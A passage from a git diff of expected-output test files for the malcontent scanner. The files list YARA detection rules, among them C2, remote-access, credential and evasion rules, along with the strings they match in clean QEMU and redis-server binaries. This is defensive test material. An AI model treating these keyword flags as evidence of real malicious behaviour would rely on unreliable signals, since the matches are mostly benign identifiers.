[/sys/dev/block](https://github.com/search?q=%2Fsys%2Fdev%2Fblock&type=code) | +| MEDIUM | [impact/remote_access/agent](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/agent.yara#agent) | references an 'agent' | [vdagent](https://github.com/search?q=vdagent&type=code) | +| MEDIUM | [impact/remote_access/heartbeat](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/heartbeat.yara#heartbeat) | references a 'heartbeat' | [06zu:qmp_enter_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_enter_x_colo_lost_heartbeat&type=code)
[06zu:qmp_exit_x_colo_lost_heartbeat](https://github.com/search?q=06zu%3Aqmp_exit_x_colo_lost_heartbeat&type=code)
[Tell COLO that heartbeat is lost](https://github.com/search?q=Tell+COLO+that+heartbeat+is+lost&type=code)
[hmp_x_colo_lost_heartbeat](https://github.com/search?q=hmp_x_colo_lost_heartbeat&type=code)
[qmp_marshal_x_colo_lost_heartbeat](https://github.com/search?q=qmp_marshal_x_colo_lost_heartbeat&type=code)
[qmp_x_colo_lost_heartbeat](https://github.com/search?q=qmp_x_colo_lost_heartbeat&type=code) | +| MEDIUM | [impact/remote_access/net_exec](https://github.com/chainguard-dev/malcontent/blob/main/rules/impact/remote_access/net_exec.yara#exec_chdir_and_socket) | exec chdir and socket | [chdir](https://github.com/search?q=chdir&type=code)
[execve](https://github.com/search?q=execve&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [lateral/scan/tool](https://github.com/chainguard-dev/malcontent/blob/main/rules/lateral/scan/scan_tool.yara#generic_scan_tool) | may scan networks | [Port](https://github.com/search?q=Port&type=code)
[Probe](https://github.com/search?q=Probe&type=code)
[Target](https://github.com/search?q=Target&type=code)
[connect](https://github.com/search?q=connect&type=code)
[gethostbyname](https://github.com/search?q=gethostbyname&type=code)
[port](https://github.com/search?q=port&type=code)
[probe](https://github.com/search?q=probe&type=code)
[scan](https://github.com/search?q=scan&type=code)
[socket](https://github.com/search?q=socket&type=code)
[target](https://github.com/search?q=target&type=code) | +| MEDIUM | [mem/anonymous_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/mem/anonymous-file.yara#memfd_create) | create an anonymous file | [memfd_create](https://github.com/search?q=memfd_create&type=code) | +| MEDIUM | [net/http/post](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/post.yara#http_post) | submits content to websites | [HTTP](https://github.com/search?q=HTTP&type=code)
[POST](https://github.com/search?q=POST&type=code)
[http](https://github.com/search?q=http&type=code) | +| MEDIUM | [net/http/websocket](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/websocket.yara#websocket) | [supports web sockets](https://www.rfc-editor.org/rfc/rfc6455) | [258EAFA5-E914-47DA-95CA-C5AB0DC85B11](https://github.com/search?q=258EAFA5-E914-47DA-95CA-C5AB0DC85B11&type=code)
[WebSocket](https://github.com/search?q=WebSocket&type=code) | +| MEDIUM | [net/ip/icmp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/icmp.yara#ping) | Uses the ping tool to generate ICMP packets | [ping 0x](https://github.com/search?q=ping+0x&type=code) | +| MEDIUM | [net/ip/parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-parse.yara#inet_pton) | parses IP address (IPv4 or IPv6) | [inet_pton](https://github.com/search?q=inet_pton&type=code) | +| MEDIUM | [net/ip/string](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-string.yara#inet_ntoa) | [converts IP address from byte to string](https://linux.die.net/man/3/inet_ntoa) | [inet_ntoa](https://github.com/search?q=inet_ntoa&type=code) | +| MEDIUM | [net/proxy/tunnel](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/proxy/tunnel_proxy.yara#tunnel_proxy) | network tunnel proxy | [crypto](https://github.com/search?q=crypto&type=code)
[proxy](https://github.com/search?q=proxy&type=code)
[socket](https://github.com/search?q=socket&type=code)
[tunnel](https://github.com/search?q=tunnel&type=code) | +| MEDIUM | [net/remote_control/vnc](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/remote_control/vnc.yara#vnc_user) | vnc user | [VNC_](https://github.com/search?q=VNC_&type=code)
[vnc_password](https://github.com/search?q=vnc_password&type=code) | +| MEDIUM | [net/socket/listen](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-listen.yara#listen) | listen on a socket | [accept](https://github.com/search?q=accept&type=code)
[listen](https://github.com/search?q=listen&type=code)
[socket](https://github.com/search?q=socket&type=code) | +| MEDIUM | [net/socket/reuseport](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/reuseport.yara#reuseport) | reuse TCP/IP ports for listening and connecting | [SO_REUSEADDR](https://github.com/search?q=SO_REUSEADDR&type=code) | +| MEDIUM | [net/tcp/sftp](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/sftp.yara#sftp) | Supports sftp (FTP over SSH) | [sftp](https://github.com/search?q=sftp&type=code)
[ssh](https://github.com/search?q=ssh&type=code) | +| MEDIUM | [net/tcp/ssh](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tcp/ssh.yara#ssh) | Uses SSH (secure shell) service | [SSH](https://github.com/search?q=SSH&type=code) | +| MEDIUM | [net/tun_tap](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/tun_tap.yara#tun_tap) | accesses the TUN/TAP device driver | [/dev/net/tun](https://github.com/search?q=%2Fdev%2Fnet%2Ftun&type=code) | +| MEDIUM | [persist/daemon](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/daemon/daemon.yara#daemon) | Run as a background daemon | [-daemon](https://github.com/search?q=-daemon&type=code)
[daemonize](https://github.com/search?q=daemonize&type=code)
[is_daemon](https://github.com/search?q=is_daemon&type=code)
[os_daemon](https://github.com/search?q=os_daemon&type=code)
[os_set_daemon](https://github.com/search?q=os_set_daemon&type=code)
[qemu_daemon](https://github.com/search?q=qemu_daemon&type=code) | +| MEDIUM | [persist/pid_file](https://github.com/chainguard-dev/malcontent/blob/main/rules/persist/pid_file.yara#pid_file) | pid file, likely DIY daemon | [pid_file](https://github.com/search?q=pid_file&type=code) | +| MEDIUM | [sus/exclamation](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/exclamation.yara#exclamations) | gets very excited | [d is not known!!](https://github.com/search?q=d+is+not+known%21%21&type=code) | +| MEDIUM | [sus/intercept](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/intercept.yara#interceptor) | References interception | [intercept_dev](https://github.com/search?q=intercept_dev&type=code)
[intercept_gpio_out](https://github.com/search?q=intercept_gpio_out&type=code)
[intercept_in](https://github.com/search?q=intercept_in&type=code)
[intercept_out](https://github.com/search?q=intercept_out&type=code)
[intercepts](https://github.com/search?q=intercepts&type=code) | +| MEDIUM | [sus/leetspeak](https://github.com/chainguard-dev/malcontent/blob/main/rules/sus/leetspeak.yara#one_three_three_seven) | References 1337 terminology' | [1337](https://github.com/search?q=1337&type=code) | +| LOW | [credential/password](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/password/password.yara#password) | references a 'password' | [Cannot derive password](https://github.com/search?q=Cannot+derive+password&type=code)
[Could not set password expire time](https://github.com/search?q=Could+not+set+password+expire+time&type=code)
[Invalid password](https://github.com/search?q=Invalid+password&type=code)
[SetPasswordAction_lookup](https://github.com/search?q=SetPasswordAction_lookup&type=code)
[change-vnc-password](https://github.com/search?q=change-vnc-password&type=code)
[enter_expire_password](https://github.com/search?q=enter_expire_password&type=code)
[exit_change_vnc_password](https://github.com/search?q=exit_change_vnc_password&type=code)
[hmp_expire_password](https://github.com/search?q=hmp_expire_password&type=code)
[hmp_set_password](https://github.com/search?q=hmp_set_password&type=code)
[marshal_expire_password](https://github.com/search?q=marshal_expire_password&type=code)
[monitor_read_password](https://github.com/search?q=monitor_read_password&type=code)
[not support password prompting](https://github.com/search?q=not+support+password+prompting&type=code)
[obj_change_vnc_password_arg_members](https://github.com/search?q=obj_change_vnc_password_arg_members&type=code)
[password is expired](https://github.com/search?q=password+is+expired&type=code)
[password is not set](https://github.com/search?q=password+is+not+set&type=code)
[please enable password auth using](https://github.com/search?q=please+enable+password+auth+using&type=code)
[prop_get_passwordid](https://github.com/search?q=prop_get_passwordid&type=code)
[prop_set_passwordid](https://github.com/search?q=prop_set_passwordid&type=code)
[protocol password](https://github.com/search?q=protocol+password&type=code)
[proxy-password-secret](https://github.com/search?q=proxy-password-secret&type=code)
[qapi_free_ExpirePasswordOptionsVnc](https://github.com/search?q=qapi_free_ExpirePasswordOptionsVnc&type=code)
[qapi_free_SetPasswordOptionsVnc](https://github.com/search?q=qapi_free_SetPasswordOptionsVnc&type=code)
[qmp_change_vnc_password](https://github.com/search?q=qmp_change_vnc_password&type=code)
[qmp_enter_set_password](https://github.com/search?q=qmp_enter_set_password&type=code)
[qmp_exit_expire_password](https://github.com/search?q=qmp_exit_expire_password&type=code)
[qmp_exit_set_password](https://github.com/search?q=qmp_exit_set_password&type=code)
[qmp_expire_password](https://github.com/search?q=qmp_expire_password&type=code)
[qmp_marshal_set_password](https://github.com/search?q=qmp_marshal_set_password&type=code)
[qmp_set_password](https://github.com/search?q=qmp_set_password&type=code)
[that match this password](https://github.com/search?q=that+match+this+password&type=code)
[type_ExpirePasswordOptionsVnc](https://github.com/search?q=type_ExpirePasswordOptionsVnc&type=code)
[type_ExpirePasswordOptions_members](https://github.com/search?q=type_ExpirePasswordOptions_members&type=code)
[visit_type_SetPasswordAction](https://github.com/search?q=visit_type_SetPasswordAction&type=code)
[visit_type_SetPasswordOptionsVnc](https://github.com/search?q=visit_type_SetPasswordOptionsVnc&type=code)
[visit_type_SetPasswordOptions_members](https://github.com/search?q=visit_type_SetPasswordOptions_members&type=code)
[vnc password expire-time](https://github.com/search?q=vnc+password+expire-time&type=code)
[vnc_display_password](https://github.com/search?q=vnc_display_password&type=code) | +| LOW | [credential/ssl/private_key](https://github.com/chainguard-dev/malcontent/blob/main/rules/credential/ssl/private_key.yara#private_key_val) | References private keys | [private_key](https://github.com/search?q=private_key&type=code) | +| LOW | [crypto/aes](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/aes.yara#crypto_aes) | Supports AES (Advanced Encryption Standard) | [AES](https://github.com/search?q=AES&type=code) | +| LOW | [crypto/tls](https://github.com/chainguard-dev/malcontent/blob/main/rules/crypto/tls.yara#tls) | tls | [crypto/tls](https://github.com/search?q=crypto%2Ftls&type=code) | +| LOW | [data/compression/bzip2](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/bzip2.yara#bzip2) | Works with bzip2 files | [bzip2](https://github.com/search?q=bzip2&type=code) | +| LOW | [data/compression/gzip](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/gzip.yara#gzip) | [works with gzip files](https://www.gnu.org/software/gzip/) | [gzip](https://github.com/search?q=gzip&type=code) | +| LOW | [data/compression/zstd](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/compression/zstd.yara#zstd) | Zstandard: fast real-time compression algorithm | [ZSTD_decompressStream](https://github.com/search?q=ZSTD_decompressStream&type=code)
[zstd](https://github.com/search?q=zstd&type=code) | +| LOW | [data/encoding/base64](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/encoding/base64.yara#b64) | Supports base64 encoded strings | [base64](https://github.com/search?q=base64&type=code) | +| LOW | [data/hash/md5](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/md5.yara#MD5) | Uses the MD5 signature format | [md5:](https://github.com/search?q=md5%3A&type=code) | +| LOW | [data/hash/sha256](https://github.com/chainguard-dev/malcontent/blob/main/rules/data/hash/sha256.yara#SHA256) | Uses the SHA256 signature format | [SHA256_](https://github.com/search?q=SHA256_&type=code) | +| LOW | [discover/process/parent](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/process/parent.yara#getppid) | gets parent process ID | [getppid](https://github.com/search?q=getppid&type=code) | +| LOW | [discover/system/platform](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/system/platform.yara#uname) | [system identification](https://man7.org/linux/man-pages/man1/uname.1.html) | [uname](https://github.com/search?q=uname&type=code) | +| LOW | [discover/user/USER](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/USER.yara#USER) | [Looks up the USER name of the current user](https://man.openbsd.org/login.1#ENVIRONMENT) | [USER](https://github.com/search?q=USER&type=code)
[getenv](https://github.com/search?q=getenv&type=code) | +| LOW | [evasion/logging/acct](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/logging/acct.yara#acct) | switch process accounting on or off | [acct](https://github.com/search?q=acct&type=code) | +| LOW | [evasion/process_injection/ptrace](https://github.com/chainguard-dev/malcontent/blob/main/rules/evasion/process_injection/ptrace.yara#known_ptrace_injectors) | known ptrace injectors | [QEMU_IS_ALIGNED](https://github.com/search?q=QEMU_IS_ALIGNED&type=code) | +| LOW | [exec/plugin](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/plugin/plugin.yara#plugin) | references a 'plugin' | [Could not load plugin](https://github.com/search?q=Could+not+load+plugin&type=code)
[Plugin options](https://github.com/search?q=Plugin+options&type=code)
[cap_disas_plugin](https://github.com/search?q=cap_disas_plugin&type=code)
[gen_plugin_u64_ptr](https://github.com/search?q=gen_plugin_u64_ptr&type=code)
[load a plugin](https://github.com/search?q=load+a+plugin&type=code)
[op_plugin](https://github.com/search?q=op_plugin&type=code)
[output from TCG plugins](https://github.com/search?q=output+from+TCG+plugins&type=code)
[plugin file](https://github.com/search?q=plugin+file&type=code)
[plugin_add_dyn_cb_arr](https://github.com/search?q=plugin_add_dyn_cb_arr&type=code)
[plugin_atexit_cb](https://github.com/search?q=plugin_atexit_cb&type=code)
[plugin_bool_parse](https://github.com/search?q=plugin_bool_parse&type=code)
[plugin_cb__udata](https://github.com/search?q=plugin_cb__udata&type=code)
[plugin_cond_to_tcgcond](https://github.com/search?q=plugin_cond_to_tcgcond&type=code)
[plugin_disas](https://github.com/search?q=plugin_disas&type=code)
[plugin_dyn_cb_arr_cmp](https://github.com/search?q=plugin_dyn_cb_arr_cmp&type=code)
[plugin_end_code](https://github.com/search?q=plugin_end_code&type=code)
[plugin_entry_code](https://github.com/search?q=plugin_entry_code&type=code)
[plugin_flush_cb](https://github.com/search?q=plugin_flush_cb&type=code)
[plugin_flush_destroy](https://github.com/search?q=plugin_flush_destroy&type=code)
[plugin_from_name](https://github.com/search?q=plugin_from_name&type=code)
[plugin_gen_disable_mem](https://github.com/search?q=plugin_gen_disable_mem&type=code)
[plugin_gen_inject](https://github.com/search?q=plugin_gen_inject&type=code)
[plugin_gen_insn_end](https://github.com/search?q=plugin_gen_insn_end&type=code)
[plugin_gen_insn_start](https://github.com/search?q=plugin_gen_insn_start&type=code)
[plugin_gen_mem](https://github.com/search?q=plugin_gen_mem&type=code)
[plugin_gen_tb_end](https://github.com/search?q=plugin_gen_tb_end&type=code)
[plugin_gen_tb_start](https://github.com/search?q=plugin_gen_tb_start&type=code)
[plugin_get_dyn_cb](https://github.com/search?q=plugin_get_dyn_cb&type=code)
[plugin_get_hwaddr](https://github.com/search?q=plugin_get_hwaddr&type=code)
[plugin_get_registers](https://github.com/search?q=plugin_get_registers&type=code)
[plugin_hwaddr_is_io](https://github.com/search?q=plugin_hwaddr_is_io&type=code)
[plugin_init](https://github.com/search?q=plugin_init&type=code)
[plugin_insn_data](https://github.com/search?q=plugin_insn_data&type=code)
[plugin_insn_disas](https://github.com/search?q=plugin_insn_disas&type=code)
[plugin_insn_haddr](https://github.com/search?q=plugin_insn_haddr&type=code)
[plugin_insn_size](https://github.com/search?q=plugin_insn_size&type=code)
[plugin_insn_symbol](https://github.com/search?q=plugin_insn_symbol&type=code)
[plugin_insn_vaddr](https://github.com/search?q=plugin_insn_vaddr&type=code)
[plugin_list](https://github.com/search?q=plugin_list&type=code)
[plugin_load_list](https://github.com/search?q=plugin_load_list&type=code)
[plugin_mem_is_store](https://github.com/search?q=plugin_mem_is_store&type=code)
[plugin_mem_size_shift](https://github.com/search?q=plugin_mem_size_shift&type=code)
[plugin_num_vcpus](https://github.com/search?q=plugin_num_vcpus&type=code)
[plugin_opt_parse](https://github.com/search?q=plugin_opt_parse&type=code)
[plugin_path_to_binary](https://github.com/search?q=plugin_path_to_binary&type=code)
[plugin_print_address](https://github.com/search?q=plugin_print_address&type=code)
[plugin_read_register](https://github.com/search?q=plugin_read_register&type=code)
[plugin_register_atexit](https://github.com/search?q=plugin_register_atexit&type=code)
[plugin_register_cb](https://github.com/search?q=plugin_register_cb&type=code)
[plugin_register_dyn_cb](https://github.com/search?q=plugin_register_dyn_cb&type=code)
[plugin_register_inline](https://github.com/search?q=plugin_register_inline&type=code)
[plugin_reset_destroy](https://github.com/search?q=plugin_reset_destroy&type=code)
[plugin_reset_uninstall](https://github.com/search?q=plugin_reset_uninstall&type=code)
[plugin_scoreboard_find](https://github.com/search?q=plugin_scoreboard_find&type=code)
[plugin_scoreboard_free](https://github.com/search?q=plugin_scoreboard_free&type=code)
[plugin_scoreboard_new](https://github.com/search?q=plugin_scoreboard_new&type=code)
[plugin_start_code](https://github.com/search?q=plugin_start_code&type=code)
[plugin_tb_get_insn](https://github.com/search?q=plugin_tb_get_insn&type=code)
[plugin_tb_n_insns](https://github.com/search?q=plugin_tb_n_insns&type=code)
[plugin_tb_trans_cb](https://github.com/search?q=plugin_tb_trans_cb&type=code)
[plugin_tb_vaddr](https://github.com/search?q=plugin_tb_vaddr&type=code)
[plugin_uninstall](https://github.com/search?q=plugin_uninstall&type=code)
[plugin_update_ns](https://github.com/search?q=plugin_update_ns&type=code)
[plugin_user_exit](https://github.com/search?q=plugin_user_exit&type=code)
[plugin_user_postfork](https://github.com/search?q=plugin_user_postfork&type=code)
[plugin_vcpu_cb__simple](https://github.com/search?q=plugin_vcpu_cb__simple&type=code)
[plugin_vcpu_exit_hook](https://github.com/search?q=plugin_vcpu_exit_hook&type=code)
[plugin_vcpu_for_each](https://github.com/search?q=plugin_vcpu_for_each&type=code)
[plugin_vcpu_idle_cb](https://github.com/search?q=plugin_vcpu_idle_cb&type=code)
[plugin_vcpu_init_hook](https://github.com/search?q=plugin_vcpu_init_hook&type=code)
[plugin_vcpu_mem_cb](https://github.com/search?q=plugin_vcpu_mem_cb&type=code)
[plugin_vcpu_resume_cb](https://github.com/search?q=plugin_vcpu_resume_cb&type=code)
[plugin_vcpu_syscall](https://github.com/search?q=plugin_vcpu_syscall&type=code)
[qemu_plugin_add_dyn](https://github.com/search?q=qemu_plugin_add_dyn&type=code)
[qemu_plugin_install](https://github.com/search?q=qemu_plugin_install&type=code)
[qemu_plugin_opts](https://github.com/search?q=qemu_plugin_opts&type=code)
[qemu_plugin_outs](https://github.com/search?q=qemu_plugin_outs&type=code)
[qemu_plugin_path_to](https://github.com/search?q=qemu_plugin_path_to&type=code)
[qemu_plugin_request](https://github.com/search?q=qemu_plugin_request&type=code)
[qemu_plugin_reset](https://github.com/search?q=qemu_plugin_reset&type=code)
[qemu_plugin_u64_add](https://github.com/search?q=qemu_plugin_u64_add&type=code)
[qemu_plugin_u64_get](https://github.com/search?q=qemu_plugin_u64_get&type=code)
[qemu_plugin_u64_set](https://github.com/search?q=qemu_plugin_u64_set&type=code)
[qemu_plugin_u64_sum](https://github.com/search?q=qemu_plugin_u64_sum&type=code)
[qemu_plugin_version](https://github.com/search?q=qemu_plugin_version&type=code)
[tcg_gen_plugin_cb](https://github.com/search?q=tcg_gen_plugin_cb&type=code)
[tcg_gen_plugin_mem_cb](https://github.com/search?q=tcg_gen_plugin_mem_cb&type=code)
[tlb_plugin_lookup](https://github.com/search?q=tlb_plugin_lookup&type=code) | +| LOW | [exec/program/background](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program-background.yara#waitpid) | [wait for process to exit](https://linux.die.net/man/2/waitpid) | [waitpid](https://github.com/search?q=waitpid&type=code) | +| LOW | [fs/directory/create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-create.yara#mkdir) | [creates directories](https://man7.org/linux/man-pages/man2/mkdir.2.html) | [mkdir](https://github.com/search?q=mkdir&type=code) | +| LOW | [fs/directory/remove](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/directory/directory-remove.yara#rmdir) | Uses libc functions to remove directories | [rmdir](https://github.com/search?q=rmdir&type=code) | +| LOW | [fs/file/delete](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-delete.yara#unlink) | [deletes files](https://man7.org/linux/man-pages/man2/unlink.2.html) | [unlinkat](https://github.com/search?q=unlinkat&type=code) | +| LOW | [fs/file/truncate](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/file/file-truncate.yara#ftruncate) | truncate a file to a specified length | [ftruncate64](https://github.com/search?q=ftruncate64&type=code) | +| LOW | [fs/link_read](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/link-read.yara#readlink) | [read value of a symbolic link](https://man7.org/linux/man-pages/man2/readlink.2.html) | [readlinkat](https://github.com/search?q=readlinkat&type=code) | +| LOW | [fs/mount](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/mount.yara#mount) | mounts file systems | [-o](https://github.com/search?q=-o&type=code)
[mount](https://github.com/search?q=mount&type=code) | +| LOW | [fs/node_create](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/node-create.yara#mknod) | [create device files](https://man7.org/linux/man-pages/man2/mknod.2.html) | [mknod](https://github.com/search?q=mknod&type=code) | +| LOW | [fs/path/etc](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/etc.yara#etc_path) | path reference within /etc | [/etc/qemu-ifdown](https://github.com/search?q=%2Fetc%2Fqemu-ifdown&type=code)
[/etc/qemu-ifup](https://github.com/search?q=%2Fetc%2Fqemu-ifup&type=code)
[/etc/qemu/qemu.conf](https://github.com/search?q=%2Fetc%2Fqemu%2Fqemu.conf&type=code) | +| LOW | [fs/path/var](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/path/var.yara#var_path) | path reference within /var | [/var/tmp](https://github.com/search?q=%2Fvar%2Ftmp&type=code) | +| LOW | [fs/permission/chown](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/permission/permission-chown.yara#fchownat) | May change file ownership | [fchownat](https://github.com/search?q=fchownat&type=code) | +| LOW | [fs/symlink_resolve](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/symlink-resolve.yara#realpath) | [resolves symbolic links](https://man7.org/linux/man-pages/man3/realpath.3.html) | [realpath](https://github.com/search?q=realpath&type=code) | +| LOW | [fs/watch](https://github.com/chainguard-dev/malcontent/blob/main/rules/fs/watch.yara#inotify) | monitors filesystem events | [inotify](https://github.com/search?q=inotify&type=code) | +| LOW | [net/dns/txt](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/dns/dns-txt.yara#dns_txt) | Uses DNS TXT (text) records | [TXT](https://github.com/search?q=TXT&type=code)
[dns](https://github.com/search?q=dns&type=code) | +| LOW | [net/http/request](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/http/http-request.yara#http_request) | makes HTTP requests | [HTTP/1.](https://github.com/search?q=HTTP%2F1.&type=code) | +| LOW | [net/ip/multicast_send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-multicast-send.yara#multicast) | [send data to multiple nodes simultaneously](https://en.wikipedia.org/wiki/IP_multicast) | [multicast](https://github.com/search?q=multicast&type=code) | +| LOW | [net/ip/send_unicast](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/ip/ip-send-unicast.yara#unicast) | send data to the internet | [unicast](https://github.com/search?q=unicast&type=code) | +| LOW | [net/resolve/hostname](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostname-resolve.yara#gethostbyname) | [resolve network host name to IP address](https://linux.die.net/man/3/gethostbyname) | [gethostbyname](https://github.com/search?q=gethostbyname&type=code) | +| LOW | [net/resolve/hostport_parse](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/resolve/hostport-parse.yara#getaddrinfo) | Network address and service translation | [freeaddrinfo](https://github.com/search?q=freeaddrinfo&type=code)
[getaddrinfo](https://github.com/search?q=getaddrinfo&type=code) | +| LOW | [net/socket/local_addr](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-local_addr.yara#getsockname) | [get local address of connected socket](https://man7.org/linux/man-pages/man2/getsockname.2.html) | [getsockname](https://github.com/search?q=getsockname&type=code) | +| LOW | [net/socket/peer_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-peer-address.yara#getpeername) | [get peer address of connected socket](https://man7.org/linux/man-pages/man2/getpeername.2.html) | [getpeername](https://github.com/search?q=getpeername&type=code) | +| LOW | [net/socket/receive](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-receive.yara#recvmsg) | [receive a message from a socket](https://linux.die.net/man/2/recvmsg) | [recvmsg](https://github.com/search?q=recvmsg&type=code) | +| LOW | [net/socket/send](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/socket/socket-send.yara#sendmsg) | [send a message to a socket](https://linux.die.net/man/2/sendmsg) | [sendmsg](https://github.com/search?q=sendmsg&type=code)
[sendto](https://github.com/search?q=sendto&type=code) | +| LOW | [net/url/embedded](https://github.com/chainguard-dev/malcontent/blob/main/rules/net/url/embedded.yara#https_url) | contains embedded HTTPS URLs | [https://qemu.org/contribute/report-a-bug](https://qemu.org/contribute/report-a-bug)
[https://wiki.qemu.org/Documentation/9psetup](https://wiki.qemu.org/Documentation/9psetup) | +| LOW | [os/fd/epoll](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/fd/epoll.yara#epoll) | [I/O event notification facility](https://linux.die.net/man/7/epoll) | [epoll_wait](https://github.com/search?q=epoll_wait&type=code) | +| LOW | [os/kernel/seccomp](https://github.com/chainguard-dev/malcontent/blob/main/rules/os/kernel/seccomp.yara#seccomp) | [operate on Secure Computing state of the process](https://man7.org/linux/man-pages/man2/seccomp.2.html) | [seccomp](https://github.com/search?q=seccomp&type=code) | +| LOW | [process/chroot](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/chroot.yara#chroot) | change the location of root for the process | [chroot](https://github.com/search?q=chroot&type=code) | +| LOW | [process/groupid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groupid-set.yara#setgid) | set real and effective group ID of process | [setgid](https://github.com/search?q=setgid&type=code) | +| LOW | [process/groups_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/groups-set.yara#setgroups) | set group access list | [setgroups](https://github.com/search?q=setgroups&type=code) | +| LOW | [process/multithreaded](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/multithreaded.yara#pthread_create) | [creates pthreads](https://man7.org/linux/man-pages/man3/pthread_create.3.html) | [pthread_create](https://github.com/search?q=pthread_create&type=code) | +| LOW | [process/unshare](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/unshare.yara#syscall_unshare) | disassociate parts of the process execution context | [unshare](https://github.com/search?q=unshare&type=code) | +| LOW | [process/userid_set](https://github.com/chainguard-dev/malcontent/blob/main/rules/process/userid-set.yara#setuid) | [set real and effective user ID of current 
process](https://man7.org/linux/man-pages/man2/setuid.2.html) | [setuid](https://github.com/search?q=setuid&type=code) | diff --git a/tests/linux/clean/redis-server.aarch64.md b/tests/linux/clean/redis-server.aarch64.md index 300e3d50b..c5917e34a 100644 --- a/tests/linux/clean/redis-server.aarch64.md +++ b/tests/linux/clean/redis-server.aarch64.md @@ -1,51 +1,52 @@ ## linux/clean/redis-server.aarch64 [🟡 MEDIUM] -| RISK | KEY | DESCRIPTION | EVIDENCE | -|--------|----------------------------------------------------------------------------------------------------------------------------------------------|-------------------------------------------------------------------------------------------------------------------|------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------------| -| MEDIUM | [c2/addr/ip](https://github.com/chainguard-dev/malcontent/blob/main/rules/c2/addr/ip.yara#ip_port_mention) | mentions an IP and port | [IP](https://github.com/search?q=IP&type=code)
[bus_port](https://github.com/search?q=bus_port&type=code)
[host_port](https://github.com/search?q=host_port&type=code)
[master_port](https://github.com/search?q=master_port&type=code)
[prev_ip](https://github.com/search?q=prev_ip&type=code)
[tcp_port](https://github.com/search?q=tcp_port&type=code)
[updatePort](https://github.com/search?q=updatePort&type=code) | -| MEDIUM | [discover/user/name_get](https://github.com/chainguard-dev/malcontent/blob/main/rules/discover/user/username-get.yara#whoami) | [returns the user name running this process](https://man7.org/linux/man-pages/man1/whoami.1.html) | [whoami](https://github.com/search?q=whoami&type=code) | -| MEDIUM | [exec/cmd](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/cmd/cmd.yara#exec) | executes a command | [execCommandAbort](https://github.com/search?q=execCommandAbort&type=code)
[replicaStartCommandStream](https://github.com/search?q=replicaStartCommandStream&type=code) | -| MEDIUM | [exec/dylib/symbol_address](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/dylib/symbol-address.yara#dlsym) | [get the address of a symbol](https://man7.org/linux/man-pages/man3/dlsym.3.html) | [dlsym](https://github.com/search?q=dlsym&type=code) | -| MEDIUM | [exec/program](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/program/program.yara#execve) | executes external programs | [execve](https://github.com/search?q=execve&type=code) | -| MEDIUM | [exec/shell/echo](https://github.com/chainguard-dev/malcontent/blob/main/rules/exec/shell/echo.yara#elf_calls_shell_echo) | [program generates text with echo command](https://linux.die.net/man/1/echo) | [echo 'maxmemory 128mb'](https://github.com/search?q=echo+%27maxmemory+128mb%27&type=code)
